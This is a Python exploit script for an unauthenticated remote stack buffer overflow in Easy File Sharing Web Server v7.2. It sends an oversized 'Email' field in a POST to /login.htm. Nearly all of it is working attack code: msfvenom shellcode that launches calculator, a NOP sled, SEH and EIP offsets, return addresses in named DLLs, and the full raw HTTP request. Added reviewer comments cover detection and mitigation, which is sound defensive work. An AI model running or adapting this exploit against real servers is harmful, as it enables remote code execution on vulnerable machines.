#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow # Exploit Author: boku (aka Bobby Cooke) # Date: February 7th, 2020 # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 # Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC # Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC # Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC # Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC # About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated, # remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed # POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create # an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the # socket directly. 
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Change the 'host' variable below to the IP address of the target device
# 4) Run this python script
# 5) The program will crash and calculator will open
#
# Reviewer notes (defender view), grounded in the header above and the request built below:
# - The vulnerable request is an unauthenticated POST to /login.htm whose 'Email' form field carries
#   a multi-kilobyte value (the buffer assembled below is just over 4000 bytes). A legitimate
#   registration form never submits an e-mail address of that size, so a server-side length check
#   on 'Email' (the header says only front-end JavaScript validates it) or a proxy/WAF rule on the
#   parameter length would stop this request; the vendor has no fix referenced on this page, so the
#   practical mitigation is to decommission or isolate v7.2.
# - Detection: POST /login.htm with an oversized, mostly non-printable 'Email' value, typically
#   followed by the server process crashing (the header says SEH is reached past 4028 bytes).
# - The return addresses below are hard-coded module offsets (ImageLoad.dll, sqlite3.dll); this
#   presumably relies on those modules loading at a fixed base — not verifiable from this file.
# - Presumably a Python 2 script (see the shebang on line 1): str and bytes objects are concatenated
#   when 'payload' is built, which Python 3 does not accept.
import socket
host = "192.168.70.134"
port = 80
nops = '\x90'*200
# Bad char = \x00,\x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode
# Payload size: 216 bytes
shellcode = b""
shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f"
shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7"
shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e"
shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60"
shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3"
shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0"
shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03"
shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8"
shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a"
shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa"
shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45"
shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b"
shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2"
shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5"
shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80"
shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f"
shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7"
shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95"
# + ECX & SEH offset @ 3996
# Padding is sized so that nops+shellcode+offsetECX is exactly 3996 bytes; the values that
# follow therefore land at fixed offsets in the overflowed buffer.
offsetECX = '\xcc'*(3996-len(nops+shellcode))
CL = '\x42'
CH = '\x3f'
offsetEIP = '\x43'*8
high2bECX = '\x42\x42'
# EIP overwrite at offset 4008
# - EBX holds PTR to payload in Heap
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)
ret1 = '\x19\x1e\x01\x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret
# - After EIP overwrite ret, ESP is at +16 bytes
offsetRet2 = '\x42'*12
ret2 = '\x5b\x02\xc4\x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]
# Full value placed in the 'Email' form field, in buffer order.
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2
# Raw HTTP request written to the socket verbatim; the form body mirrors what /register.ghp submits.
httpRequest = "POST /login.htm HTTP/1.1\r\n"
httpRequest += "Host: "+host+"\r\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\r\n"
httpRequest += "Accept-Encoding: gzip, deflate\r\n"
httpRequest += "Referer: http://"+host+"/register.ghp\r\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\r\n"
httpRequest += "Connection: close\r\n"
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201\r\n"
httpRequest += "Upgrade-Insecure-Requests: 1\r\n"
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=®ister=Register%21\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): the bare 'except' below swallows every error (connection refused, send failure,
# even KeyboardInterrupt) behind one generic message, so a failure cannot be diagnosed from the
# output; the socket is also never closed explicitly.
try:
    connect = s.connect((host, port))
    print("[+] Successfully connected to "+host)
    s.send(httpRequest)
    print("[+] Payload Sent")
except:
    print("Failure to launch")